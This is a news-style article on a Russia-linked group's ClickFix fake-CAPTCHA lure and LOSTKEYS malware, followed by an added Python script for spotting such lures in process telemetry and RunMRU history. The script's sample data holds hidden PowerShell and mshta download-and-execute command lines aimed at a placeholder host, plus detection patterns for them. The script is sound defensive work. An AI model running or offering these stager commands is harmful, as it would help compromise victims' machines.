Russian Hackers Use Fake CAPTCHA to Spread Malware
A Russia-linked hacking group known as COLDRIVER (also tracked as Star Blizzard and Callisto) has been observed deploying a new malware strain dubbed LOSTKEYS in a cyber-espionage campaign, according to findings shared by Google Threat Intelligence Group (GTIG). The lure is a fake CAPTCHA page built in the ClickFix style: rather than serving a file for the target to download, the page copies a PowerShell command to the clipboard and tells the visitor to "verify" by pasting it into the Windows Run dialog, so the victim launches the first stage of the infection chain themselves.
Once running, LOSTKEYS, a Visual Basic script delivered through several PowerShell stages, scans the host for files in a hard-coded list of directories and with a hard-coded list of extensions, and exfiltrates matching files to servers controlled by the attackers. It also collects basic system information and a list of running processes, giving the operator an inventory of the compromised environment.
The use of social-engineering lures such as fake CAPTCHA challenges marks a continued evolution in COLDRIVER's operational playbook. Because the target runs the command themselves, the lure sidesteps browser download warnings and Mark-of-the-Web checks on the payload; what remains for defenders is process lineage (a script interpreter spawned by explorer.exe with a download-and-execute command line) and the Run dialog's RunMRU history in the user's registry hive. The campaign underscores the persistent threat posed by state-linked actors focused on intelligence gathering, and reflects a broader trend of targeting users through increasingly convincing, contextually plausible lures.
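ClickFix-style lures get the user to paste a command into the Windows Run dialog, which leaves two artifacts worth checking: an interpreter such as powershell.exe or mshta.exe launched by explorer.exe with a download-and-execute command line, and the pasted command itself in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following is an added example, not code from this article or from Google's report, that runs both checks over constructed Sysmon-style process-creation records and a constructed RunMRU export. The hostile command line and the captcha.invalid URL are placeholders chosen for illustration, not COLDRIVER's real stager.

```python
import ntpath
import re

# Constructed Sysmon event ID 1 style records (not real telemetry). The hostile
# command line and URL are placeholders, not the real COLDRIVER stager.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt'},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ProcessId": 4301, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -nop -c "iex (irm https://captcha.invalid/verify)"'},
    {"ProcessId": 4377, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta https://captcha.invalid/check.hta"},
]

# Constructed RunMRU export. Explorer stores each Run-dialog entry with a
# trailing "\1" and an MRUList value listing the keys, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "bca",
    "a": r"notepad\1",
    "b": r'powershell -w hidden -nop -c "iex (irm https://captcha.invalid/verify)"\1',
    "c": r"\\fileserver\share\1",
}

# The Run dialog (Win+R) is hosted by explorer.exe, so that is the parent we care about.
RUN_DIALOG_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits typical of a copy-paste download-and-execute stager.
INDICATORS = [
    ("hidden_window", r"-w(indowstyle)?\s+hidden"),
    ("no_profile", r"-nop(rofile)?\b"),
    ("encoded_command", r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    ("web_request", r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b"),
    ("invoke_expression", r"\b(iex|invoke-expression)\b"),
    ("remote_url", r"https?://"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in INDICATORS]


def command_indicators(cmdline: str) -> list[str]:
    """Names of the stager traits present in a command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def is_clickfix_chain(event: dict) -> bool:
    """explorer.exe -> interpreter with at least one stager trait."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    return (parent in RUN_DIALOG_PARENTS and image in INTERPRETERS
            and bool(command_indicators(event.get("CommandLine", ""))))


def detect(events: list[dict]) -> list[dict]:
    """Return the flagged events with the traits that triggered them."""
    return [{"ProcessId": e["ProcessId"],
             "Image": ntpath.basename(e["Image"]).lower(),
             "indicators": command_indicators(e["CommandLine"])}
            for e in events if is_clickfix_chain(e)]


def suspicious_runmru(values: dict[str, str]) -> list[tuple[str, list[str]]]:
    """Walk RunMRU in MRUList order and flag interpreter launches with stager traits."""
    flagged = []
    for key in values.get("MRUList", ""):
        raw = values.get(key, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw  # strip Explorer's "\1" suffix
        tokens = cmd.split(maxsplit=1)
        if not tokens:
            continue
        exe = ntpath.basename(tokens[0].strip('"')).lower()
        if not exe.endswith(".exe"):
            exe += ".exe"  # the Run dialog accepts "powershell" without the extension
        hits = command_indicators(cmd)
        if exe in INTERPRETERS and hits:
            flagged.append((key, hits))
    return flagged


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("process:", hit)
    for key, hits in suspicious_runmru(SAMPLE_RUNMRU):
        print("RunMRU", key, hits)
```

On a live host the same two functions would be fed from Sysmon or EDR process-creation telemetry and from `Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`; a plain `powershell` launched from the Run dialog with no arguments is deliberately not flagged, since only the download-and-execute traits distinguish the lure from ordinary use.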
